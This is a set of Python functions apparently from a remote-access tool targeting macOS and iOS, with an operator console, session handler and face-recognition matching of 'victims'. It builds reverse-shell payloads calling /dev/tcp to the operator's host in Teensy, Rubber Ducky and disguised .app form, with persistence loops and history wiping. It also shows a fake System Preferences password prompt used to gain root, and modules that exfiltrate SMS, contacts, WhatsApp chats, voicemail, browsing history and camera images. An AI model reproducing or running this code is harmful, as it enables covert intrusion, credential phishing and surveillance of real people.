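def interact(self):
    """Run the operator console loop until ``exit`` or Ctrl-C.

    Each line read with ``raw_input`` is split into a command word and the
    remainder of the line (passed as one string to handlers that take an
    argument).  ``exit`` and KeyboardInterrupt both call ``stop_server``
    and return.
    """
    h.info_general("Listening on port {0}...".format(self.server.port))
    h.info_general("Type \"help\" for commands")
    # Handlers that receive the rest of the line as their argument.
    with_args = {
        "interact": self.interact_with_session,
        "close": self.close_session,
    }
    # Handlers that take no argument.
    no_args = {
        "sessions": self.list_sessions,
        "help": self.show_commands,
    }
    while True:
        try:
            input_data = raw_input(self.handle)
            # Bug fix: a whitespace-only line is truthy, so the original
            # reached ``split()[0]`` and raised IndexError.
            parts = input_data.split()
            if not parts:
                continue
            cmd = parts[0]
            # Bug fix: strip leading blanks before slicing, otherwise a line
            # such as " close 1" yielded args "e 1" instead of "1".
            args = input_data.lstrip()[len(cmd):].strip()
            if cmd in with_args:
                with_args[cmd](args)
            elif cmd in no_args:
                no_args[cmd]()
            elif cmd == "exit":
                self.stop_server()
                return
            else:
                h.info_error("Invalid Command: " + cmd)
        except KeyboardInterrupt:
            sys.stdout.write("\n")
            self.stop_server()
            return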
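def run(self, session, cmd_data):
    """Pull Safari's history or bookmarks database from the device and print it.

    The first word of ``cmd_data['args']`` selects the target: ``history``
    (history.db) or ``bookmarks`` (Bookmarks.db).  The file is written to
    downloads/ and parsed with the matching ``dbfparser`` routine; anything
    else prints ``self.usage``.
    """
    tokens = cmd_data['args'].split()
    # Bug fix: the original compared ``args[0]`` -- the first *character* of
    # the argument string -- with "history"/"bookmarks", so neither branch
    # could ever run.  Compare the first token instead.
    target = tokens[0] if tokens else None
    if target == "history":
        file_name = "history.db"
        parse = dbfparser.parse_safari_history_db
        show = dformat.print_formatted_history
    elif target == "bookmarks":
        file_name = "Bookmarks.db"
        parse = dbfparser.parse_safari_bookmarks_db
        show = dformat.print_formatted_bookmarks
    else:
        print(self.usage)
        return
    h.info_general("Downloading {0}".format(file_name))
    data = session.download_file('/private/var/mobile/Library/Safari/' + file_name)
    if not data:
        return
    local_path = os.path.join('downloads', file_name)
    with open(local_path, 'wb') as f:
        f.write(data)
    show(parse(local_path))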
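def run(self, session, cmd_data):
    """Upload a local file to the session: ``upload <local_file> [<remote_path>]``.

    The remote path is split into directory and file name; a missing half
    falls back to "." / the local file name.  A relative local path is
    resolved against $OLDPWD (where the operator launched the tool from)
    rather than chdir-ing there and back as the original did: this avoids
    KeyError when OLDPWD/HOME are unset and never leaves the process cwd
    pointing at ``$HOME/mouse``.
    """
    if not cmd_data['args']:
        print(self.usage)
        return
    # Split on unescaped spaces only, so "My\ File" stays one token.
    paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip())
    if len(paths) > 2:
        print("Usage: upload <local_file> <remote_dir>")
        return
    local_path = paths[0]
    local_file = os.path.basename(local_path)
    if len(paths) == 1:
        remote_dir, remote_file = ".", local_file
    else:
        remote_dir, remote_file = os.path.split(paths[1])
        remote_dir = remote_dir or "."
        remote_file = remote_file or local_file
    old_pwd = os.environ.get('OLDPWD')
    if old_pwd and not os.path.isabs(local_path):
        local_path = os.path.join(old_pwd, local_path)
    session.upload_file(local_path, remote_dir, remote_file)
    h.info_general("File successfully uploaded!")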
def run(self, session, cmd_data):
    """Upload a local file to the session.

    Syntax: ``upload <local_file> [<remote_path>]``.  With one argument the
    file keeps its name and lands in the session's current directory (".").
    A second argument is split into directory and file name; either half may
    be omitted and falls back to "." / the local file name respectively.
    """
    args = cmd_data['args']
    if not args:
        print(self.usage)
        return
    # Split on unescaped spaces only, so "My\ File.txt" stays one token.
    parts = re.split(r'(?<!\\) ', args.rstrip())
    if len(parts) > 2:
        print("USAGE")
        return
    local_path = parts[0]
    local_name = os.path.split(local_path)[1]
    remote_dir, remote_name = ".", local_name
    if len(parts) == 2:
        target_dir, target_name = os.path.split(parts[1])
        remote_dir = target_dir or "."
        remote_name = target_name or local_name
    session.upload_file(local_path, remote_dir, remote_name)
    h.info_general("Done")
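def disconnect(self, verbose):
    """Close this session's socket and drop it from the multi-handler registries.

    :param verbose: when true, announce the close and pause briefly so the
        message is visible before the prompt returns.
    """
    self.conn.close()
    if verbose:
        h.info_general("Closing session")
        time.sleep(0.5)
    multihandler = self.server.multihandler
    if multihandler.is_running:
        # pop() instead of del: a second disconnect, or a session that was
        # never registered, must not raise KeyError.
        multihandler.sessions_id.pop(self.id, None)
        multihandler.sessions_uid.pop(self.uid, None)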
def run(self,server):
    """Write a Teensy (Arduino) keystroke-injection sketch that opens a macOS
    Terminal and types a bash reverse shell to ``server.host:server.port``.

    Asks once whether the shell should reconnect in a loop ("persistent").
    Output goes to payloads/teensy_macos/teensy_macos.ino.
    """
    while 1:
        persistence = raw_input(h.info_question_raw("Make Persistent? (y/N): ")).lower()
        if persistence == "y":
            # Backgrounded reconnect loop, retrying every 5 s.
            shell_command = "while true; do $(bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
            break
        elif persistence == "n" or not persistence:
            shell_command = "bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
            break
        else:
            h.info_error("Unrecognized option!")
    # Wipe shell history and close the Terminal window after launching.
    shell_command += "history -wc;killall Terminal"
    if os.path.exists("payloads") == False:
        os.mkdir("payloads")
    if os.path.exists("payloads/teensy_macos") == False:
        os.mkdir("payloads/teensy_macos")
    payload_save_path = "payloads/teensy_macos/teensy_macos.ino"
    # NOTE(review): shell_command is spliced into a C string literal without
    # escaping; a host/port containing '"' or '\' would break the sketch.
    payload = """\
#include "Keyboard.h"
const int LED = 13;
void setup() {
pinMode(LED, OUTPUT);
Serial.begin(9600);
delay(1000); //delay to establish connection
Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.set_key1(KEY_SPACE);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(200);
Keyboard.print("terminal");
delay(1000);
keyEnter();
delay(1000);
Keyboard.print(\""""+shell_command+"""\");
keyEnter();
}
void keyEnter() {
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
//release
Keyboard.set_key1(0);
Keyboard.send_now();
}
void loop() {
digitalWrite(LED, HIGH);
delay(100);
digitalWrite(LED, LOW);
delay(100);
}"""
    f = open(payload_save_path,"w")
    f.write(payload)
    f.close()
    h.info_general("Payload saved to " + payload_save_path)
def run(self, session, cmd_data):
    """Forward ``persistence install|uninstall`` to the implant.

    Any other argument prints the usage line and sends nothing.
    """
    action = cmd_data['args']
    if action not in ("install", "uninstall"):
        print("Usage: persistence install|uninstall")
        return
    h.info_general("Installing..." if action == "install" else "Uninstalling...")
    session.send_command(cmd_data)
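def close_session(self, session_number):
    """Close session ``session_number`` (a string from the console) and drop it.

    Prints usage when no number is given; an unparsable or unknown number is
    reported as invalid.  Errors raised by ``disconnect`` itself are no
    longer hidden behind "Invalid session number!" (the original used a bare
    except around both the lookup and the close).
    """
    if not session_number:
        print("Usage: close <session_number>")
        return
    try:
        session = self.sessions_id[int(session_number)]
    except (ValueError, KeyError):
        h.info_error("Invalid session number!")
        return
    session.disconnect(False)
    h.info_general('Closing session ' + session_number + '...')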
def run(self, session, cmd_data):
    """Forward ``install`` / ``uninstall`` to the implant's persistence handler.

    A truthy reply from the implant is treated as an error message and shown.
    """
    action = cmd_data['args']
    if action not in ("install", "uninstall"):
        print(self.usage)
        return
    h.info_general("Installing..." if action == "install" else "Uninstalling...")
    reply = session.send_command(cmd_data)
    if reply:
        h.info_error(reply)
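def close_session(self,session_number):
    """Terminate the session with the given console number and unregister it.

    Prints usage when the number is missing.  An unparsable or unknown
    number is printed and reported as invalid; the original's blanket
    ``except Exception`` also swallowed failures inside ``disconnect``,
    which now propagate.
    """
    if not session_number:
        print("Usage: Terminate + [Session Number]")
        return
    try:
        session = self.sessions_id[int(session_number)]
    except (ValueError, KeyError) as e:
        print(e)
        h.info_error("Invalid Session Number. Please Put The Correct Session Number.")
        return
    session.disconnect(False)
    h.info_general('Terminating Session ' + session_number)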
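def close_session(self, session_number):
    """Close the session with the given console number and unregister it.

    Prints usage when the number is missing; an unparsable or unknown number
    is printed and reported as "Invalid Session".  Failures inside
    ``disconnect`` are no longer masked (the original caught every
    Exception around both steps).
    """
    if not session_number:
        print("Usage: close (session number)")
        return
    try:
        session = self.sessions_id[int(session_number)]
    except (ValueError, KeyError) as e:
        print(e)
        h.info_error("Invalid Session")
        return
    session.disconnect(False)
    h.info_general('Closing session ' + session_number)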
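def run(self, session, cmd_data):
    """Fetch the device's voicemail database, cache it under downloads/, and list it.

    ``session.vm_fetched`` records that downloads/voicemail.db is already on
    disk, so later invocations parse the cached copy.  The original
    downloaded on every call but then skipped both the write and the listing
    once the flag was set, so repeat calls printed nothing.
    """
    file_name = "voicemail.db"
    voicemail_db_file = os.path.join('downloads', file_name)
    if session.vm_fetched and os.path.exists(voicemail_db_file):
        h.info_general("Using cached {0}".format(file_name))
    else:
        h.info_general("Downloading {0}".format(file_name))
        data = session.download_file('/private/var/mobile/Library/Voicemail/' + file_name)
        if not data:
            return
        with open(voicemail_db_file, 'wb') as f:
            f.write(data)
        session.vm_fetched = True
    vm = dbfparser.parse_voicemail_db(voicemail_db_file)
    dformat.print_formatted_voicemails(vm)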
def background_listener(self):
    """Accept stager connections and register each one as a numbered session.

    Loops while ``self.is_running``.  Every connection returned by
    ``self.server.listen_for_stager()`` is either an already-known ``uid``
    (refreshed via ``update_session`` when its ``needs_refresh`` flag is set,
    then skipped) or a new session: it gets the next id, is appended to
    ``self.victims['victims']`` and handed to ``identify_victim``.
    Returns once ``self.is_running`` is cleared.
    """
    self.server.is_multi = True
    self.is_running = True
    id_number = 1
    while 1:
        if self.is_running:
            session_infos = self.server.listen_for_stager()
            if session_infos:
                session, hostAddress = session_infos
                if session.uid in self.sessions_uid.keys():
                    if self.sessions_uid[session.uid].needs_refresh:
                        self.update_session(self.sessions_uid[session.uid], session)
                    # Known uid: never register a duplicate session.
                    continue
                else:
                    self.sessions_uid[session.uid] = session
                    self.sessions_id[id_number] = session
                    self.new_session_id = id_number
                    session.id = id_number
                    victim = {}
                    victim_info = {}
                    # Construct victims info dict
                    victim['session_id'] = id_number
                    victim['ip_address'] = hostAddress
                    victim_info['username'] = session.username
                    victim_info['hostname'] = session.hostname
                    victim_info['type'] = session.type
                    victim['victim_info'] = victim_info
                    victim['identified'] = False
                    # Append victim into victim list
                    self.victims['victims'].append(victim)
                    self.victims['total_victims'] += 1
                    id_number += 1
                    sys.stdout.write(
                        "\n{0}[*]{2} Session {1} opened{2}\n{3}".format(
                            h.COLOR_INFO, str(session.id), h.WHITE, self.handle))
                    sys.stdout.flush()
                    # Whether this victim is identified
                    # If identified, add this victim into identified victim list
                    self.identify_victim(session.id)
                    # Notify that victims have been changed
                    self.victims_modify = True
                    # self.init_interact_with_session()
        else:
            h.info_general("Exit the listener")
            return
def run(self, session, cmd_data):
    """Request a screenshot from the implant and store it as downloads/screenshot_<epoch>.jpg.

    The implant answers with JSON: either ``error`` (shown to the operator)
    or ``size``, the number of image bytes that follow on the socket.
    """
    reply = json.loads(session.send_command(cmd_data))
    if 'error' in reply:
        h.info_error(reply['error'])
        return
    if 'size' not in reply:
        return
    image = session.sock_receive_data(int(reply['size']))
    file_name = "screenshot_{0}.jpg".format(int(time.time()))
    h.info_general("Saving {0}".format(file_name))
    with open(os.path.join('downloads', file_name), 'wb') as out:
        out.write(image)
    h.info_general("Saved to ./downloads/{0}".format(file_name))
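def run(self, session, cmd_data):
    """Prompt for the user's password and ask the implant to escalate with it.

    NOTE(review): the original line is corrupted in this copy
    (``getpass.getpass("Password: "******"\\", ...``); the body below is
    reconstructed from the sibling module that issues the same ``eggsu``
    command -- confirm against the upstream file.
    """
    password = getpass.getpass("Password: ")
    # Escape backslashes and single quotes; presumably the implant embeds the
    # value in a single-quoted shell string -- verify against the agent side.
    cmd_data['args'] = password.replace("\\", "\\\\").replace("'", "\\'")
    cmd_data['cmd'] = "eggsu"
    result = session.send_command(cmd_data)
    if "root" in result:
        h.info_general("Root Granted")
        time.sleep(0.2)
        h.info_general("Escalating Privileges")
        if not session.server.is_multi:
            session.server.update_session(session)
        else:
            session.needs_refresh = True
    else:
        print("failed getting root")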
def run(self,session,cmd_data):
    """Show a fake "System Preferences" password dialog on the target and try root with the answer.

    The AppleScript loops the dialog until a non-empty value is entered and
    echoes it back; the operator is then asked whether to pass it to the
    implant's ``eggsu`` command.  Always returns "".
    """
    payload = """
tell application "Finder"
activate
set myprompt to "Type your password to allow System Preferences to make changes"
set ans to "Cancel"
repeat
try
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
set ans to button returned of d_returns
set mypass to text returned of d_returns
if mypass > "" then exit repeat
end try
end repeat
try
do shell script "echo " & quoted form of mypass
end try
end tell
"""
    cmd_data.update({"cmd":"applescript","args":payload})
    password = session.send_command(cmd_data).strip()
    #display response
    print h.COLOR_INFO+"[*] "+h.WHITE+"Response: "+h.GREEN+password+h.WHITE
    #prompt for root
    tryroot = raw_input("Would you like to try for root? (Y/n) ")
    tryroot = tryroot if tryroot else "y"
    if tryroot.lower() != "y":
        return ""
    #TODO: I am so lazy, probably should use the su command
    # Escape backslashes and single quotes before handing the value to eggsu
    # (presumably it lands inside a single-quoted shell string).
    password = password.replace("\\","\\\\").replace("'","\\'")
    cmd_data.update({"cmd":"eggsu","args":password})
    result = session.send_command(cmd_data)
    if "root" in result:
        h.info_general("Root Granted!")
        time.sleep(0.2)
        h.info_general("Escalating Privileges...")
        # Single-handler mode swaps the session in place; multi-handler mode
        # defers it to the listener via needs_refresh.
        if session.server.is_multi == False:
            session.server.update_session(session)
        else:
            session.needs_refresh = True
    else:
        h.info_error("Failed getting root!")
    return ""
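def identify_victim(self, session_id):
    """Match the session's first capture against the local face database.

    Returns True when the victim is (or already was) identified, False
    otherwise.  On a match the victim record is flagged ``identified`` and a
    ``{'session_id', 'profile'}`` entry is appended to
    ``self.identified_victims``.
    """
    if session_id < 1:
        h.info_error("Invalid Session")
        return False
    try:
        victim = self.victims['victims'][session_id - 1]
        if victim['identified']:
            return True
        file_name = self.sessions_id[session_id].init_interact()
        response = json.loads(faceRec(file_name))
        h.info_general("Face Rec Result:")
        print(response)
        if response['status'] != "Ok":
            print("No Face Rec result")
            return False
        faceid = response['faceId']
        print(faceid)
        face_to_person = self.faceid_mapping['FaceToPerson']
        if faceid not in face_to_person:
            print("Person not in Database")
            return False
        person_name = face_to_person[faceid]
        for person in self.person_db['Person']:
            if person['name'] == person_name:
                self.identified_victims['identified_victims'].append(
                    {'session_id': session_id, 'profile': person})
                self.identified_victims['total_identified_victims'] += 1
                break
        victim['identified'] = True
        return True
    except Exception as e:
        # Boundary handler: faceRec, JSON decoding and the dict/list lookups
        # can all fail.  Print the cause instead of the original bare except.
        print(e)
        h.info_error("Person cannot be recognized")
        return False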
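def run(self, server):
    """Build a macOS .app bundle whose launcher script runs a bash reverse shell to ``server``.

    Prompts for the app name, an .icns icon path and whether the shell
    should reconnect in a loop.  resources/payload.app is copied to
    payloads/macos_application/<name>.app, the icon moved into it, and
    Contents/MacOS/payload.sh written and marked executable.
    """
    import shutil  # plain file operations replace the shelled-out cp/mv

    while True:
        name = raw_input(h.info_general_raw("Application Name> "))
        icon = raw_input(h.info_general_raw("Application Icon> "))
        persistence = raw_input(
            h.info_general_raw("Make Persistent? (y/N): ")).lower()
        target = "/dev/tcp/" + str(server.host) + "/" + str(server.port)
        if persistence == "y":
            # Backgrounded reconnect loop, retrying every 5 s.
            shell_command = "while true; do $(bash &> " + target + " 0>&1); sleep 5; done & "
            break
        elif persistence == "n" or not persistence:
            shell_command = "bash &> " + target + " 0>&1;"
            break
        else:
            h.info_error("invalid option: " + persistence)
    app_root = "payloads/macos_application"
    if not os.path.isdir(app_root):
        os.makedirs(app_root)
    # Bug fix: the original interpolated name/icon into an os.system() string
    # unquoted, so a name containing a space or shell metacharacter broke the
    # copy/rename or was interpreted by the shell.  File APIs need no quoting.
    app_path = os.path.join(app_root, name + ".app")
    shutil.copytree("resources/payload.app", app_path)
    shutil.move(icon, os.path.join(app_path, "Contents", "Resources", "payload.icns"))
    payload_save_path = os.path.join(app_path, "Contents", "MacOS", "payload.sh")
    payload = "#! /usr/bin/env bash\n" + shell_command + "\n"
    with open(payload_save_path, "w") as f:
        f.write(payload)
    # Equivalent of `chmod +x`.
    os.chmod(payload_save_path, os.stat(payload_save_path).st_mode | 0o111)
    h.info_general("Payload saved to " + app_path)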
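def get_all_images(self, victim_name):
    """List the .jpg files stored for an identified victim under DB/<name>/Images/.

    Returns a dict with ``images`` (file names), ``total_images`` and
    ``image_path``, or None when the name is empty, there is no DB/<name>
    folder, or the file system cannot be read.  The Images folder is created
    when missing.  Exceptions are narrowed to OSError (the original used
    three nested bare excepts).
    """
    if not victim_name:
        h.info_error("Invalid victim name")
        return None
    victim_db_path = "./DB/"
    try:
        victims_folders = os.listdir(victim_db_path)
    except OSError:
        # No DB directory yet; the original also returned None silently here.
        return None
    # listdir yields bare entry names, so a name containing a path separator
    # can never match -- this is what keeps the "DB/" + victim_name join
    # below from being a traversal.
    if victim_name not in victims_folders:
        h.info_general("Unidentified victim")
        return None
    personal_db_image_path = "DB/" + victim_name + "/Images/"
    try:
        if not os.path.exists(personal_db_image_path):
            os.makedirs(personal_db_image_path)
        images = [f for f in os.listdir(personal_db_image_path) if f.endswith('.jpg')]
    except OSError:
        h.info_error("Fetching Images Error")
        return None
    return {
        'images': images,
        'total_images': len(images),
        'image_path': personal_db_image_path,
    }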
def run(self, server):
    """Write a USB Rubber Ducky script that opens a macOS Terminal and types a
    bash reverse shell to ``server.host:server.port``.

    Asks once whether the shell should reconnect in a loop ("persistent").
    Output goes to payloads/rubber_duck/payload.txt.
    """
    while 1:
        persistence = raw_input(
            h.info_question_raw("Make Persistent? (y/N): ")).lower()
        if persistence == "y":
            # Backgrounded reconnect loop, retrying every 5 s.
            shell_command = "while true; do $(bash &> /dev/tcp/" + str(
                server.host) + "/" + str(
                    server.port) + " 0>&1); sleep 5; done & "
            # NOTE(review): shell_clean is assigned but never used; the same
            # text is appended to shell_command below.
            shell_clean = "history -wc;killall Terminal"
            break
        elif persistence == "n" or not persistence:
            shell_command = "bash &> /dev/tcp/" + str(
                server.host) + "/" + str(server.port) + " 0>&1;"
            shell_clean = "history -wc;killall Terminal"
            break
        else:
            h.info_error("Unrecognized option!")
    # Wipe shell history and close the Terminal window after launching.
    shell_command += "history -wc;killall Terminal"
    if os.path.exists("payloads") == False:
        os.mkdir("payloads")
    if os.path.exists("payloads/rubber_duck") == False:
        os.mkdir("payloads/rubber_duck")
    payload_save_path = "payloads/rubber_duck/payload.txt"
    payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """ + shell_command + """
DELAY 500
ENTER
DELAY 500
"""
    f = open(payload_save_path, "w")
    f.write(payload)
    f.close()
    h.info_general("Payload saved to " + payload_save_path)
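def run(self,session,cmd_data):
    """Take a photo with the front or back camera and save it under downloads/.

    ``cmd_data['args']`` must be "front" or "back"; it is rewritten to a
    boolean (True = front) before the command is sent.  The implant replies
    with JSON containing ``success`` and ``size`` (bytes to read from the
    socket) or ``error``.
    """
    which = cmd_data['args']
    if which != "front" and which != "back":  # also rejects empty/None
        print(self.usage)
        return
    front = which == "front"
    cmd_data['args'] = front
    h.info_general("Taking picture...")
    try:
        response = json.loads(session.send_command(cmd_data))
        if 'success' in response:
            size = int(response["size"])
            file_name = "{0}_{1}.jpg".format("front" if front else "back", int(time.time()))
            data = session.sock_receive_data(size)
            h.info_general("Saving {0}".format(file_name))
            # Bug fix: the JPEG bytes were written in text mode ('w'); use
            # 'wb' like the other capture modules so the image is not mangled.
            with open(os.path.join('downloads', file_name), 'wb') as f:
                f.write(data)
            h.info_general("Saved to ./downloads/{0}".format(file_name))
        elif 'error' in response:
            h.info_error(response['error'])
        else:
            h.info_error("Unexpected error")
    except Exception as e:
        print(e)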
def init_interact_with_session(self):
    """Run face recognition on the newest session's first capture and store the matched profile.

    Uses ``self.new_session_id``; on a match, ``self.victims`` is keyed by
    that id and ``victims_modify`` is set.
    NOTE(review): this indexes ``self.victims`` directly by session id,
    whereas background_listener uses ``self.victims['victims']`` -- confirm
    which shape is current.
    """
    if self.new_session_id < 1:
        h.info_error("Invalid Session")
        return
    try:
        file_name = self.sessions_id[self.new_session_id].init_interact()
        response = faceRec(file_name)
        response = json.loads(response)
        h.info_general("Face Rec Result:")
        print(response)
        if response['status'] == "Ok":
            print(response['faceId'])
            faceid = response['faceId']
        else:
            print("no data match")
            faceid = ""
        if faceid in self.faceid_mapping['FaceToPerson']:
            person_name = self.faceid_mapping['FaceToPerson'][faceid]
            for person in self.person_db['Person']:
                if person['name'] == person_name:
                    self.victims[self.new_session_id] = person
                    self.victims_modify = True
    except:
        # Bare except: any failure in faceRec / JSON / lookups ends up here.
        h.info_error("Person cannot be recognized")
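def run(self, session, cmd_data):
    """Download the iOS Notes database (notes.sqlite) into downloads/."""
    file_name = "notes.sqlite"
    h.info_general("Downloading {0}".format(file_name))
    data = session.download_file('/var/mobile/Library/Notes/' + file_name)
    if not data:
        return
    h.info_general("Saving {0}".format(file_name))
    # Bug fix: sqlite bytes were opened in text mode ('w'); binary mode
    # matches the sibling download modules and avoids newline translation.
    with open(os.path.join('downloads', file_name), 'wb') as f:
        f.write(data)
    h.info_general("Saved to ./downloads/{0}".format(file_name))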
def run(self, session, cmd_data):
    """Fetch the iOS SMS database (sms.db) into downloads/ and mark the session as fetched."""
    file_name = "sms.db"
    remote_path = '/var/mobile/Library/SMS/' + file_name
    h.info_general("Downloading {0}".format(file_name))
    payload = session.download_file(remote_path)
    if not payload:
        return
    h.info_general("Saving {0}".format(file_name))
    with open(os.path.join('downloads', file_name), 'wb') as out:
        out.write(payload)
    h.info_general("Saved to ./downloads/{0}".format(file_name))
    session.sms_fetched = True
def run(self, session, cmd_data):
    """Fetch the iOS contacts database (AddressBook.sqlitedb) into downloads/."""
    file_name = "AddressBook.sqlitedb"
    remote_path = '/var/mobile/Library/AddressBook/' + file_name
    h.info_general("Downloading {0}".format(file_name))
    payload = session.download_file(remote_path)
    if not payload:
        return
    h.info_general("Saving {0}".format(file_name))
    with open(os.path.join('downloads', file_name), 'wb') as out:
        out.write(payload)
    h.info_general("Saved to ./downloads/{0}".format(file_name))
def run(self, session, cmd_data):
    """Drop the espro dylib and its plist into MobileSubstrate's DynamicLibraries and respring.

    Both files are uploaded under dot-prefixed names; SpringBoard is then
    killed so the substrate loader picks the new library up.
    """
    destination = "/Library/MobileSubstrate/DynamicLibraries"
    uploads = [
        ("Uploading dylib 1/2...", "resources/espro.dylib", ".espl.dylib"),
        ("Uploading plist 2/2...", "resources/espro.plist", ".espl.plist"),
    ]
    for message, local_path, remote_name in uploads:
        h.info_general(message)
        session.upload_file(local_path, destination, remote_name)
    h.info_general("Respring...")
    time.sleep(1)
    session.send_command({"cmd": "killall", "args": "SpringBoard"})
def run(self, session, cmd_data):
    """Fetch the WhatsApp message store (ChatStorage.sqlite) into downloads/.

    NOTE(review): the AppGroup container id in the remote path is
    hard-coded; it looks like the id captured from one particular device,
    so other devices may need a different value -- confirm.
    """
    file_name = "ChatStorage.sqlite"
    remote_path = ('/private/var/mobile/Containers/Shared/AppGroup/'
                   'D135448A-EDA9-417C-B6BE-53B0F614C3E2/' + file_name)
    h.info_general(
        "Downloading {0}... (this may take a while)".format(file_name))
    payload = session.download_file(remote_path)
    if not payload:
        return
    h.info_general("Saving {0}".format(file_name))
    with open(os.path.join('downloads', file_name), 'wb') as out:
        out.write(payload)
    h.info_general("Saved to ./downloads/{0}".format(file_name))
    session.wa_fetched = True
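def run(self, session, cmd_data):
    """Download an arbitrary remote file (``download <remote_path>``) to downloads/<basename>."""
    remote_path = cmd_data['args']
    if not remote_path:
        print(self.usage)
        return
    file_name = os.path.split(remote_path)[-1]
    # A path ending in "/" has no file component; the original then tried to
    # open the downloads directory itself for writing.
    if not file_name:
        print(self.usage)
        return
    h.info_general("Downloading {0}".format(file_name))
    data = session.download_file(remote_path)
    if not data:
        return
    h.info_general("Saving {0}".format(file_name))
    # Bug fix: 'wb' rather than 'w' -- the payload is raw bytes, as in the
    # other download modules.
    with open(os.path.join('downloads', file_name), 'wb') as f:
        f.write(data)
    h.info_general("Saved to ./downloads/{0}".format(file_name))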
def run(self, session, cmd_data):
    """Capture an iSight photo and save it as downloads/isight_<epoch>.jpg.

    The implant's JSON reply carries ``status`` (1 on success) and ``size``,
    the number of image bytes that follow on the socket.  Any failure while
    reading the reply is printed rather than raised.
    """
    h.info_general("Taking picture...")
    reply = json.loads(session.send_command(cmd_data))
    try:
        if reply["status"] == 1:
            expected = int(reply["size"])
            file_name = "isight_{0}.jpg".format(int(time.time()))
            image = session.sock_receive_data(expected)
            h.info_general("Saving {0}".format(file_name))
            with open(os.path.join('downloads', file_name), 'wb') as out:
                out.write(image)
            h.info_general("Saved to ./downloads/{0}".format(file_name))
    except Exception as e:
        print(e)
def save_images(self, session_id, filename):
    """Copy a capture from DB/pictures/<filename> into the identified victim's DB/<name>/Images/.

    Only sessions flagged ``identified`` are handled; the name comes from the
    matching entry in ``self.identified_victims``.  The copy is re-encoded
    via PIL at quality 10 (small thumbnails, not a faithful copy).
    """
    if session_id < 1:
        h.info_error("Invalid Session")
        return
    try:
        idx = session_id - 1
        victim = self.victims['victims'][idx]
        # Only save the image for identified victim
        if not victim['identified']:
            h.info_general("Session has not been identified")
            return
        victim_name = None
        identified_victims = self.identified_victims['identified_victims']
        # NOTE: this loop variable shadows the outer ``victim`` record.
        for victim in identified_victims:
            if victim['session_id'] == session_id:
                victim_name = victim['profile']['name']
                break
        # Had found the victim, save the image in personal db
        if victim_name:
            try:
                image_path = "./DB/pictures/" + filename
                # victim_name comes from the local person DB; nothing here
                # rejects path separators in it -- NOTE(review) confirm the
                # DB is trusted before relying on that.
                personal_db_image_path = "./DB/" + victim_name + "/Images/"
                if not os.path.exists(personal_db_image_path):
                    os.makedirs(personal_db_image_path)
                image = Image.open(image_path)
                image.save(personal_db_image_path + filename, optimize=True, quality=10)
                h.info_general("Saved to" + personal_db_image_path + filename)
                return
            except:
                h.info_error("Image save path error")
                return
        else:
            h.info_general("Haven't found the target victim")
            return
    except:
        h.info_error("Error in Saving the image")
        return